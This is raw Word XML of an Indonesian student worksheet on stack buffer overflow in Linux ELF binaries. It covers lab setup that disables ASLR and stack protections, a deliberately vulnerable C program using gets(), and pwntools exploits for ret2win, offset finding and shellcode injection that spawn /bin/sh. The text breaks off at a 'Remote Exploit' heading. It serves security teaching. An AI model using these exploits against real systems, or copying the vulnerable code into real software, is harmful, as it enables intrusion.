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820F" w14:textId="37D7BA33" w:rsidR="00DD027E" w:rsidRDefault="00DD027E" w:rsidP="00FD4F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LEMBAR KERJA PESERTA DIDIK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6107297A" w14:textId="77777777" w:rsid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0A209" w14:textId="77777777" w:rsidR="00DD027E" w:rsidRP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2D0B9" w14:textId="70A3EAE3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5724">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Mata Pelajaran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1329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29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1329B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Jaringan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6608CE4E" w14:textId="26648DD4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572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45724">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007442AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="007442AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008C5DDC" w:rsidRPr="008C5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Buffer Overflow</w:t>
      </w:r>
      <w:r w:rsidR="00F1329B" w:rsidRPr="00F1329B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CF551E" w14:textId="0B06B18B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5724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C45724">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Waktu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C45724">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4 × 45 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C45724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7501529C" w14:textId="48D8A92B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1893B0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5DDC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8C5DDC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2AE6B635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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE8DEFA" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="00FB0BE8" w:rsidRDefault="008C5DDC" w:rsidP="00FB0BE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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0BE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B0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BE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B0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BE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B0BE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB0BE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>buffer overflow</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB0BE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BF00D9" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="00FB0BE8" w:rsidRDefault="008C5DDC" w:rsidP="00FB0BE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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0BE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B0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0BE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B0BE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> stack (stack frame).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6190718D" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="00FB0BE8" w:rsidRDefault="008C5DDC" w:rsidP="00FB0BE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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0BE8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FB0BE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> offset overflow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D611D90" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="00FB0BE8" w:rsidRDefault="008C5DDC" w:rsidP="00FB0BE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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0BE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B0BE8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FB0B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0BE8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FB0BE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pwntools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB0BE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B81A5F" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="00FB0BE8" w:rsidRDefault="008C5DDC" w:rsidP="00FB0BE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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0BE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B0BE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB0BE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B0BE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> pada binary ELF Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED86821" w14:textId="1B765A48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1FADFB" w14:textId="527BBBFA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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Persiapan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C5D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8C5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Ubuntu 22.04)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D62308D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: Ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AED7E2B" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="00FB0BE8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0BE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Install tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340E15A8" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="00FE627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apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B61A660" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="00FE627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apt install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gcc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gdb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python3 python3-pip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C386A46" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="00FE627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pwntools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6B51B826" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="00FB0BE8" w:rsidRDefault="008C5DDC" w:rsidP="00FB0BE8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B0BE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nonaktifkan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB0B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0BE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>proteksi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB0BE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B0BE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FB0BE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> lab </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB0BE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>saja</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB0BE8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391276E7" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="00FE627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echo 0 |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tee /proc/sys/kernel/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randomize_va_space</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="14684161" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="00FB0BE8" w:rsidRDefault="008C5DDC" w:rsidP="00FB0BE8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0BE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Compile binary </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB0BE8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FB0B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0BE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>proteksi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB0BE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A0E852" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="00FE6274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gcc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vuln.c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-o vuln -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fno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-stack-protector -no-pie -z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execstack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7DFD99EE" w14:textId="6D15F5A5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074151" w14:textId="3636E692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8C5D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</w:p>
    <w:p w14:paraId="02616BAA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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6C04D0" w14:textId="7B172F0C" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="00523D1E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Studi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kasus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="41019846" w14:textId="7604C53B" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="00523D1E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Kode vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753B97CF" w14:textId="59732F71" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="00523D1E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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0A3BCD00" w14:textId="598C39BA" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="00523D1E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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lastRenderedPageBreak/>
        <w:t>Exploit Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33342296" w14:textId="15A44232" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="00523D1E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Pembahasan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="721FA70F" w14:textId="738F6BEF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58F118" w14:textId="0DF37D5F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5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>KASUS 1 – Overflow Dasar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46260F4B" w14:textId="694C799C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5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Studi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C5DDC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</w:p>
    <w:p w14:paraId="3D258777" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="00FB0BE8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0BE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">File </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FB0BE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vuln</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FB0BE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB0BE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CAA430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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7009BBF9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7D26EF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win(){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1C4B72D2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 xml:space="preserve">"You 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Win!\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>n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1580AD85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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048D88E2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C8F71B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vuln(){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6CBC98B4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>32];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3B1FB0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    gets(buffer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693B64CC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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2696D95A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1D131D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6A72E299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vuln(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>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546C0815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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7EFB2C" w14:textId="286A738B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76B640" w14:textId="1371CF44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13AA4E8A" w14:textId="77777777" w:rsidR="00C47742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Buffer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32 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byte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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463AAB56" w14:textId="0793CF9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32 byte → overwrite return address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CBE645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Cek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win(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>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504DD1B6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objdump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-d vuln | grep win</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54731B7E" w14:textId="277C79F4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F28B96" w14:textId="7C6396F0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5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exploit Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E1D907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pwn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import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084FABBA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7BAB4D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p = process(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>vuln")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2298FA23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win_addr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= 0x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401146  #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objdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61C0E395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lastRenderedPageBreak/>
        <w:t xml:space="preserve">payload =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b"A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"*40 + p64(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win_addr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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE7C749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D51489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p.sendline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E819D84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p.interactive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D84B150" w14:textId="13A261E9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93142B" w14:textId="3B28E0B0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</w:p>
    <w:p w14:paraId="437981C0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C5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>32 byte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 xml:space="preserve"> buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27736B35" w14:textId="569FBDB6" w:rsidR="008C5DDC" w:rsidRPr="00C47742" w:rsidRDefault="008C5DDC" w:rsidP="00C47742">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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742">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8 byte saved RBP</w:t>
      </w:r>
      <w:r w:rsidR="00C47742" w:rsidRPr="00C47742">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C47742">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>= 40 byte offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E49C89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Return address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win(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>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A55E3CD" w14:textId="19D1302F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10F383" w14:textId="64D78CE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5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">KASUS 2 – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mencari</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Offset </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C5DDC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8C5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cyclic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515A995E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pwntools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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBA8E82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pwn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import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF9BF28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2748A2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cyclic(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>100))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341A464B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Kirim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crash di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gdb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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F07841C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gdb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>/vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E641059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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD3E8A5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RIP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F90D243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info registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DF49C1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Cari offset:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1D3CDF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cyclic_find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(0x6161616c)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B4DCA1" w14:textId="3C455FF9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80C702" w14:textId="55ACF65F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5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>KASUS 3 – Return to Function (ret2win)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5F6C3F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Binary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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C88288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secret(){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2C44667C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    system("/bin/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");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571C7D09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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF5A1E0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Exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5005E3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pwn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import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FEA483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FA27A2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lastRenderedPageBreak/>
        <w:t>p = process(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>vuln")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CF36DC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787AEE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secret_addr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= 0x401196</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3310AA3E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payload =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b"A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"*40 + p64(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secret_addr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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215FE5B1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FB709E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p.sendline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271C5BE1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p.interactive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FD9198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shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC7394D" w14:textId="67747F70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EE2AF2" w14:textId="5C05915B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5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>KASUS 4 – NX Disabled (Shellcode Injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF25603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Jika stack executable (-z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execstack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inject shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDA919A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shellcode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4210729F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pwn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import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0A2803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ADC44B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p = process(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>vuln")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31505CD8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069E03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shellcode =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asm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shellcraft.sh(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>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE8C73C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30233D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payload = shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C497DA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payload +=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b"A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"*(40-len(shellcode))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0264FA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payload += p64(0x7fffffffe000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buffer (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sesuaikan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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE8D0CB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9ECCE5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p.sendline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49273C2A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p.interactive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013C0256" w14:textId="5CA62F71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324002" w14:textId="622EDC5E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5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>KASUS 5 – Remote Exploit (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
